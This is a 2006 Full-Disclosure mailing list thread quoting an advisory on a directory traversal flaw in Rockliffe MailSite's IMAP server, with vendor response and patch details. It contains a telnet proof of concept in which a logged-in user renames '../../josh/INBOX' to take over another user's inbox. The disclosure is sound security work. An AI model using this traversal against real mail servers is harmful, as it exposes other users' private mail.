[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <Pine.LNX.4.61.0601050650440.6775@zur>
Date: Thu Jan 5 15:23:45 2006
From: jzlatin at ramat.cc (Josh Zlatin)
Subject: Rockliffe Directory Transversal Vulnerability
On Wed, 4 Jan 2006, Stan Bubrouski wrote:
> Seeing as most IMAP servers allow you to use ../../ with SELECT, etc..
> (think uw-imapd for example) I think I would categorize this as more
> of a permissions problem.
The Mailsite IMAP server needs to run as the local system account. The
IMAP server can not run as a regular user. Removing write permissions
from the individual IMAP accounts has no effect in stopping users
from stealing directories (such as INBOX) from other accounts.
--
- Josh
>
> -sb
>
> On 1/4/06, Josh Zlatin <jzlatin@...at.cc> wrote:
>> Synopsis: Rockliffe's Mailsite Imap Directory Transversal Vulnerability.
>>
>> Product: Rockliffe Mailsite
>> http://www.rockliffe.com
>>
>> Version: Confirmed on Mailsite < 6.1.22.1
>>
>> Author: Josh Zlatin-Amishav
>>
>> Date: January 4, 2006
>>
>> Background:
>> Rockliffe MailSite secure email server software and MailSite MP secure email
>> gateways provide email server solutions and gateway email protection for
>> businesses and service providers. Rockliffe has more than 3,000 customers
>> hosting more than 15 million mailboxes worldwide.
>>
>> Issue:
>> In working with researchers at Tenable Network Security, I have come across
>> a directory transversal flaw in the IMAP server. It is possible for an
>> authenticated user to access any user's inbox via a RENAME command.
>>
>> PoC:
>>
>> josh@...1:~$ telnet 10.0.0.5 143
>> Trying 10.0.0.5...
>> Connected to 10.0.0.5.
>> Escape character is '^]'.
>> * OK MailSite IMAP4 Server 6.1.22.0 ready
>> a1 login joe pass
>> a1 OK LOGIN completed
>> a2 rename ../../josh/INBOX gotcha
>> a2 OK RENAME folder ../../josh/INBOX renamed to gotcha
>> a3 select gotcha
>> * FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
>> * 0 EXISTS
>> * 0 RECENT
>> * OK [PERMANENTFLAGS (\Answered \Flagged \Deleted \Seen \Draft \*)]
>> * OK [UNSEEN 0]
>> * OK [UIDVALIDITY 514563061] UIDs are valid
>> a3 OK [READ-WRITE] opened gotcha
>>
>> user joe can now access the contents of user josh's INBOX directory.
>>
>> Vendor notified: January 3, 2006 06:12AM
>>
>> Vendor Response:
>> Contact your sales rep about purchasing Mailsite 7.0.3.1
>>
>> Solution:
>> Mailsite fixed a buffer overun in the Mailsite IMAP server which also fixes
>> the directory transversal problem. Either upgrade to version 6.1.22 and install
>> the hotfix (i.e. upgrade to 6.1.22.1), or install the latest version of
>> Mailsite. The hotfix can be obtained at:
>>
>> ftp://ftp.rockliffe.com/MailSite/6.1.22/Hotfixes/MailSiteServicePack.exe
>>
>> References: http://www.rockliffe.com
>> References: http://zur.homelinux.com/Advisories/RockliffeMailsiteDirTransveral.txt
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
Powered by blists - more mailing lists